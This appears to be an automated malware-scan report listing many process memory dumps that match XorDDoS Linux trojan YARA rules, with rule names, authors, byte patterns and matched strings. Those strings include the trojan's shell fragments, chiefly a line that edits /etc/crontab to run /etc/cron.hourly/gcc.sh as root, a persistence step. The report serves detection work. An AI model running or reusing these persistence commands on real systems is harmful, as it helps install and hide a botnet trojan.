5672.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5672.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5672.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5672.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5606.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5606.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5606.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5606.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5458.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5458.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5458.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5458.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5612.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5612.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5612.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5612.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5553.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5553.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5553.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5553.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5533.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5533.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5533.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5533.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5538.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5538.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5538.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5538.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5731.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5731.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5731.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5731.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5716.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5716.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5716.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5716.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5657.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5657.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5657.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5657.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5592.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5592.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5592.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5592.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5734.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5734.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5734.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5734.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5660.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5660.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5660.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5660.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5643.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5643.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5643.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5643.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5663.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5663.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5663.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5663.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5568.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5568.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5568.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5568.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5548.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5548.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5548.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5548.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5473.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5473.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5473.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5473.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5763.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5763.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5763.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5763.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5498.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5498.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5498.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5498.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5750.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5750.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5750.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5750.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5573.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5573.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5573.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5573.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5435.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5435.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5435.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
